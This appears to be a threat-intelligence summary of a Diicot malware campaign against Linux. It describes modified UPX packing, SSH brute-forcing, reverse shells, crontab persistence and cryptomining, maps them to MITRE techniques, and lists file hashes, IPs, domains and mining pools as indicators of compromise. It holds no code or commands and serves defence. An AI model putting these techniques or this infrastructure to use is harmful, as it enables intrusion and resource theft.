Unpacking the Diicot Malware Targeting Linux Environments

Researchers attribute a new Linux-targeting campaign to the Romanian-speaking Diicot group that uses modified UPX packing, cloud-aware payloads, SSH brute-forcing, reverse shells, and crontab persistence to spread across cloud and non-cloud hosts. The campaign includes cryptomining components (custom XMRig and Zephyr protocol), HTTP-based C2 infrastructure and multiple payload servers, and has generated measurable Monero revenue. #Diicot #XMRig

Keypoints

The campaign is attributed to the Romanian-speaking Diicot (aka Mexals) and targets Linux systems, especially those running OpenSSH with weak credentials.
Attackers use a modified UPX packer (changed header and corrupted checksums) to evade standard unpacking and scanning tools.
Payloads are cloud-aware: cloud hosts trigger spreading behavior while non-cloud hosts are more likely to receive cryptomining payloads.
Main components include an Update (brute-spreader) binary, a reverse shell (cache), and a scanner (.bisis) for finding OpenSSH hosts.
Persistence is achieved by modifying crontab entries and scheduling recurring tasks; C2 communication occurs over HTTP with dedicated servers and domains.
Cryptomining (custom XMRig and Zephyr protocol) is present in the campaign; tracked Monero mining earnings exceed ~$16,000 from observed wallets.

MITRE Techniques

[T1027.002] Obfuscated Files or Information – Modified UPX header and corrupted checksum to prevent standard unpacking (‘changes the magic header from UPX! to YTSx99 and corrupts checksums’).
[T1053.003] Scheduled Task/Job: Cron – Maintains persistence by modifying crontab to schedule recurring tasks (‘modifying the crontab to schedule recurring tasks’).
[T1071.001] Application Layer Protocol: Web Protocols – Uses HTTP-based C2 to communicate with attacker servers and send reports (‘The malware communicates with a C2 server … using Go’s default HTTP implementation’).
[T1041] Exfiltration Over C2 Channel – Sends error and success reports (including brute-force results and system info) to the C2 server (‘sending two types of reports: error reports and information about successful brute-force attempts’).
[T1110.001] Brute Force: Password Guessing – Scans for OpenSSH and brute-forces weak credentials using a username/password list and the .bisis scanner (‘scans port 22 … looks specifically for responses indicating the presence of OpenSSH’ and then tries credential combinations).
[T1496.001] Resource Hijacking: Cryptomining – Deploys cryptominer payloads (custom XMRig and Zephyr) on non-cloud hosts to mine Monero/Zephyr-supported coins (‘contains a cryptominer (a custom version of XMRig) … references to mining pools and Zephyr protocol’).

Indicators of Compromise

[File names] Primary payloads and artifacts – Update, cache, .bisis, abc123 (used as cryptomining/payload components).
[File hashes] Sample file hashes from analyzed payloads – a2101ec53fb0934b23f83c582d3a0bed9f66fd13 (Update), 2ec6af460feabfe9ed37c1955ff266cff63f31ff (cache), and 3 more hashes.
[IP addresses] Attacker infrastructure and C2 – 80.76.51[.]5 (main payload server), 87.120.116[.]35 (C2 / mining pool), and other addresses such as 87.120.114[.]219 and 91.92.250[.]6.
[Domains] Domains used for payload hosting and C2 – digital.digitaldatainsights[.]org (payload server), test.digitaldatainsights[.]org (C2/mining), pauza.digitaldatainsights[.]org (reverse-shell C2).
[Mining pool URLs] Mining endpoints observed in configs – pool.supportxmr[.]com:443 and 87.120.116.35:7777 (Zephyr/Monero pools and configured users).